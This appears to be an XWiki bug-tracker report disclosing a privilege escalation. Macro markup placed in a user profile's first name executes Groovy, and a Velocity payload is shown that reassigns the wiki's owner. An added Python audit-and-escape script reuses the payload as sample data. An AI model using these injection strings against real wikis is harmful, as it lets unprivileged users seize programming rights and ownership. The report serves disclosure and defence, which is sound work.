Details
- Bug
- Resolution: Solved By
- Blocker
- 3.1 M1
- High
- Unknown
Description
Steps to reproduce
- Log in as a user without script rights.
- Set your first name to
{{cache id="userProfile"}}{{groovy}}println("Hello from groovy!"){{/groovy}}{{/cache}}
Expected result:
{{cache id="userProfile"}}{{groovy}}println("Hello from groovy!"){{/groovy}}{{/cache}}
is displayed as first name.
Actual result:
The username in the profile is Hello from groovy!
This demonstrates a privilege escalation attack to programming rights. I don't know yet why or how this works as this was primarily a surprise result while trying to reproduce another vulnerability.
I've also verified that you can actually do dangerous stuff, for example
{{async async="true" cached="false" context="doc.reference"}}{{velocity}}#set($descriptor = $services.wiki.currentWikiDescriptor)) #set($void = $descriptor.setOwnerId("XWiki.NewOwner")) #set($void = $services.wiki.saveDescriptor($descriptor)){{/velocity}}{{/async}}
sets the wiki's owner to the given user id.
The affects version is only the version I reproduced the issue on; this is quite likely much older.
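The report shows that wiki macro syntax stored in a user-editable profile field (here the first name) is rendered rather than escaped, and the linked issue points at escaping `{` as the fix direction. The following Python snippet is an added, illustrative example of a defender-side check, not code from this report or from XWiki: it audits stored profile fields for `{{macro}}` openers, flags the ones that can reach scripting or caching macros, and shows how such values could be neutralised before being fed to the renderer. The sample profile records are constructed for this example, the list of "script-capable" macro names is an assumption, and the use of `~` as the XWiki 2.x syntax escape character is likewise assumed here rather than taken from the page.

```python
import re

# Matches the opener of an XWiki 2.x-style macro such as {{groovy}} or
# {{cache id="userProfile"}}; closers like {{/groovy}} are deliberately not matched.
MACRO_OPEN = re.compile(r"\{\{\s*([A-Za-z][\w-]*)")

# Assumption for this example: macros whose presence in user-supplied text should
# be treated as a privilege-escalation attempt rather than harmless formatting.
SCRIPT_CAPABLE_MACROS = frozenset({"groovy", "python", "velocity", "async", "cache"})

# Constructed sample data: three profiles, one carrying the payload from the report.
SAMPLE_PROFILES = [
    {"user": "alice", "first_name": "Alice", "last_name": "Example"},
    {
        "user": "mallory",
        "first_name": '{{cache id="userProfile"}}{{groovy}}println("Hello from groovy!"){{/groovy}}{{/cache}}',
        "last_name": "Smith",
    },
    {"user": "bob", "first_name": "Bob", "last_name": "Curly braces { } alone are fine"},
]


def find_macro_names(text):
    """Return the names of all macro openers found in a text field, in order."""
    return [m.group(1).lower() for m in MACRO_OPEN.finditer(text)]


def audit_profiles(profiles, flagged=SCRIPT_CAPABLE_MACROS):
    """Scan every non-identifier field of each profile record for macro syntax.

    Returns one finding per field that contains macro markup, noting whether any
    of the macros found is on the script-capable list.
    """
    findings = []
    for profile in profiles:
        for field, value in profile.items():
            if field == "user" or not isinstance(value, str):
                continue
            names = find_macro_names(value)
            if names:
                findings.append({
                    "user": profile["user"],
                    "field": field,
                    "macros": names,
                    "script_capable": any(n in flagged for n in names),
                })
    return findings


def escape_macro_markers(text):
    """Neutralise macro syntax in user-supplied text before it reaches the renderer.

    Assumption: '~' is the syntax escape character, so '~' is doubled first and every
    '{' is then prefixed with '~', which breaks the '{{' sequence a macro parser needs.
    """
    return text.replace("~", "~~").replace("{", "~{")


if __name__ == "__main__":
    for finding in audit_profiles(SAMPLE_PROFILES):
        print(finding)
    print(escape_macro_markers(SAMPLE_PROFILES[1]["first_name"]))
```

The audit function is meant to run over existing profile data after the fix is deployed, since stored values written before the escaping was added would still be rendered as macros; escaping on output is the complementary control.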
Attachments
Issue Links
- duplicates: XCOMMONS-2498 XWikiUtils#escapeElementText should also escape { (Closed)
- links to